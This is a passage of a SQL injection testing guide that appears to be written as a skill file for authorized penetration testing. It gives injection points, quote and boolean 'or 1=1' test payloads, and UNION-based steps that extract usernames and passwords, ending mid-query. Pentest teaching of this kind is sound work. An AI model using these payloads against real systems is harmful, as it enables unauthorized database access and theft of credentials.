Sql Injection Testing

# SQL Injection Testing

Comprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation.

## Description

USE WHEN:
- Testing for SQL injection vulnerabilities
- Performing authorized penetration tests
- Validating input sanitization mechanisms
- Bypassing authentication for security testing
- Extracting database information (authorized)
- Learning SQL injection defense

DON'T USE WHEN:
- No written authorization for testing
- Testing production systems with real user data
- Intent is malicious (don't be evil)

⚠️ **LEGAL REQUIREMENT**: Written penetration testing authorization required before use.

---

## Detection Phase

### Injection Point Identification

Common injectable parameters:
```
URL params:    ?id=1, ?user=admin, ?category=books
Form fields:   username, password, search, comments
Cookies:       session_id, user_preference
HTTP headers:  User-Agent, Referer, X-Forwarded-For
```

### Basic Vulnerability Tests

```sql
-- Single quote test
'

-- Double quote test
"

-- Comment sequences
--
#
/**/

-- Semicolon for query stacking
;
```

**Watch for:**
- Database error messages
- HTTP 500 errors
- Modified response content/length
- Unexpected behavior changes

### Boolean Logic Tests

```sql
-- True condition (should return data)
page.asp?id=1 or 1=1
page.asp?id=1' or 1=1--
page.asp?id=1" or 1=1--

-- False condition (should return nothing/error)
page.asp?id=1 and 1=2
page.asp?id=1' and 1=2--
```

Compare responses between true/false to confirm injection.

---

## Exploitation Techniques

### UNION-Based Extraction

```sql
-- Step 1: Determine column count
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
-- Continue until error occurs

-- Step 2: Find displayable columns
UNION SELECT NULL,NULL,NULL--
UNION SELECT 'a',NULL,NULL--
UNION SELECT NULL,'a',NULL--

-- Step 3: Extract data
UNION SELECT username,password,NULL FROM users--
UNION SELECT table_name,NULL,NULL FROM information_schema.ta...